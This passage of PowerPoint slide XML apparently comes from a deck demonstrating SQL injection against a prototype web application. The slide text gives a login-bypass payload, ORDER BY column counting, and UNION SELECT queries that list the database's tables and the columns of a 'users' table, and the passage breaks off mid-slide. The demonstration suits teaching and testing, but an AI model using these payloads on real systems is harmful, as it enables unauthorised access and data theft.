          <p:cNvPr id="25" name="Graphic 24" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3419CC27-F704-E6F3-F7C5-AC953F931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8467" y="4671898"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Graphic 25" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B01785CA-D4FF-E087-93F0-E1F9728B3A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8898" y="5050895"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Graphic 26" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7365A9B8-5D49-75A6-4FA8-2118946A8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9981" y="4671898"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Graphic 27" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFF17A66-F0B8-6572-6B72-67DB919F0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7796" y="3457641"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Graphic 28" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB3912D5-4A4C-CB4C-204E-78A0D0CA7A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75082" y="4120938"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Graphic 29" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{004F0DB0-34C4-33D8-B1F9-C4C73674F3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6582" y="4698989"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Graphic 30" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0692407A-3D53-524E-D66E-A4EC8E73B4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1403" y="5053595"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="Graphic 31" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45C4DCD2-6CD0-18B9-DF18-588A706AA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1342" y="3405522"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="Graphic 32" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5313FB3C-8D22-EEF8-513B-4DC84A6CCD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0525" y="4120938"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="34" name="Graphic 33" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{266FC81F-CCD7-FDED-A4CA-260C4B7CE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1342" y="5050895"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="35" name="Graphic 34" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D847A7CD-0852-3741-2376-E7DC05315E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6401" y="3429353"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="36" name="Graphic 35" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B2A18C5-861E-6638-8786-6764DC1359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6402" y="4120938"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Graphic 36" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D76247A-CA70-BBDB-660C-0B51038FEC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9568" y="4653680"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38" name="Graphic 37" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{549C27E9-36CD-4B49-51B0-CC565CC4CC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0850" y="5080885"/>
            <a:ext cx="385185" cy="374272"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39" name="Graphic 38" descr="Checkmark with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAB16817-598F-5BD6-8194-8C709B7EE5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1342" y="4679897"/>
            <a:ext cx="385185" cy="3742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r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Prototype Walk Through / Demonstration </a:t>
            </a:r>
            <a:endParaRPr lang="en-SG" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A diagram of a computer network&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D13CBEC-C313-80C5-18B1-129673B9CC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192" y="1803082"/>
            <a:ext cx="5312369" cy="4826318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A diagram of a computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3316673-82CD-619F-9F99-E8383D991D4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5869812" y="1803083"/>
            <a:ext cx="5724780" cy="49158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lluminated server room panel">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC4F3DC3-BD9E-4CC4-881C-9482A3E0032A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>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04285BE2-F988-8FB7-59C8-973213AA04C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web Application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="147617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6AAAF-7755-BA51-DC35-9203003B4D3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643192" y="609600"/>
            <a:ext cx="3643674" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>SQLi </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{498B6DF9-EAF2-A428-8F88-27B1CF047918}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643192" y="2666999"/>
            <a:ext cx="3643674" cy="3216276"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>‘or 1=1#  ( This query will help to login to the first user in the db)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0058B9DB-FAD7-63C5-3C73-801B2AACD61C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4630994" y="1159407"/>
            <a:ext cx="6916633" cy="42191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41037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0B1EA-0DCF-CDA4-421E-2A7329105C0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6420465" y="609600"/>
            <a:ext cx="5122606" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:gradFill flip="none" rotWithShape="1">
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:sysClr val="window" lastClr="FFFFFF">
                        <a:lumMod val="65000"/>
                      </a:sysClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5580000" scaled="0"/>
                  <a:tileRect/>
                </a:gradFill>
              </a:rPr>
              <a:t>Check for the db details in the search bar.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0948F92-CD74-D75B-4B80-1FAD5FAC62C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6420465" y="2666999"/>
            <a:ext cx="5122606" cy="3216276"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1">
                <a:gradFill flip="none" rotWithShape="1">
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:sysClr val="window" lastClr="FFFFFF">
                        <a:lumMod val="75000"/>
                      </a:sysClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5580000" scaled="0"/>
                  <a:tileRect/>
                </a:gradFill>
              </a:rPr>
              <a:t>' ORDER BY 1#    </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:gradFill flip="none" rotWithShape="1">
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:sysClr val="window" lastClr="FFFFFF">
                        <a:lumMod val="75000"/>
                      </a:sysClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5580000" scaled="0"/>
                  <a:tileRect/>
                </a:gradFill>
              </a:rPr>
              <a:t> (change the value until a error message shows, the message only shows once the number of columns exceeded.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:gradFill flip="none" rotWithShape="1">
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:sysClr val="window" lastClr="FFFFFF">
                        <a:lumMod val="75000"/>
                      </a:sysClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5580000" scaled="0"/>
                  <a:tileRect/>
                </a:gradFill>
              </a:rPr>
              <a:t>This query will help to find number of coloum’s in the current table.                         </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:sysClr val="window" lastClr="FFFFFF">
                      <a:lumMod val="75000"/>
                    </a:sysClr>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5580000" scaled="0"/>
                <a:tileRect/>
              </a:gradFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:gradFill flip="none" rotWithShape="1">
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:sysClr val="window" lastClr="FFFFFF">
                        <a:lumMod val="75000"/>
                      </a:sysClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5580000" scaled="0"/>
                  <a:tileRect/>
                </a:gradFill>
              </a:rPr>
              <a:t>                                                         error is shown at  ‘ORDER BY 11# which means  there </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:gradFill flip="none" rotWithShape="1">
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:sysClr val="window" lastClr="FFFFFF">
                        <a:lumMod val="75000"/>
                      </a:sysClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5580000" scaled="0"/>
                  <a:tileRect/>
                </a:gradFill>
              </a:rPr>
              <a:t>                                                           only 10 columns available                                                                                        </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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95A495-C0D7-FA65-3E1E-AA03713362A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1148186" y="1546445"/>
            <a:ext cx="4451371" cy="3420683"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167359842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7154B-C4F0-5D4A-37FF-7BDDE635C6CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6420465" y="609600"/>
            <a:ext cx="5122606" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:gradFill flip="none" rotWithShape="1">
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:sysClr val="window" lastClr="FFFFFF">
                        <a:lumMod val="65000"/>
                      </a:sysClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5580000" scaled="0"/>
                  <a:tileRect/>
                </a:gradFill>
              </a:rPr>
              <a:t>Find the names of tables in the DB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CA26167-6C43-0524-0B79-DBAC11A86340}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6420465" y="2666999"/>
            <a:ext cx="5122606" cy="3216276"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900" b="1">
                <a:gradFill flip="none" rotWithShape="1">
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:sysClr val="window" lastClr="FFFFFF">
                        <a:lumMod val="75000"/>
                      </a:sysClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5580000" scaled="0"/>
                  <a:tileRect/>
                </a:gradFill>
              </a:rPr>
              <a:t>' UNION SELECT NULL, table_name, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM information_schema.tables WHERE table_schema = database()#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1900">
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="0">
                    <a:sysClr val="window" lastClr="FFFFFF"/>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:sysClr val="window" lastClr="FFFFFF">
                      <a:lumMod val="75000"/>
                    </a:sysClr>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5580000" scaled="0"/>
                <a:tileRect/>
              </a:gradFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:gradFill flip="none" rotWithShape="1">
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:sysClr val="window" lastClr="FFFFFF">
                        <a:lumMod val="75000"/>
                      </a:sysClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5580000" scaled="0"/>
                  <a:tileRect/>
                </a:gradFill>
              </a:rPr>
              <a:t>database(): Retrieves the name of the current database dynamically.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1900">
                <a:gradFill flip="none" rotWithShape="1">
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:sysClr val="window" lastClr="FFFFFF">
                        <a:lumMod val="75000"/>
                      </a:sysClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5580000" scaled="0"/>
                  <a:tileRect/>
                </a:gradFill>
              </a:rPr>
              <a:t>table_name: Lists all table names in the current database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="19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C01420-C441-81DB-1FEA-E06F0499CA88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1221590" y="1115267"/>
            <a:ext cx="4304562" cy="4283039"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="315889218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C052-CDA7-6903-CB30-558F3B4075E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643191" y="609600"/>
            <a:ext cx="6573685" cy="1905000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Find the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>coloum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> names in the table user</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87ADC40C-5BB2-3763-862B-A5019C4216B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643192" y="2666999"/>
            <a:ext cx="6573684" cy="3216276"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1"/>
              <a:t>' UNION SELECT NULL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" err="1"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1"/>
              <a:t>, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1"/>
              <a:t> WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1"/>
              <a:t> = 'users' AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1"/>
              <a:t> = database()#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
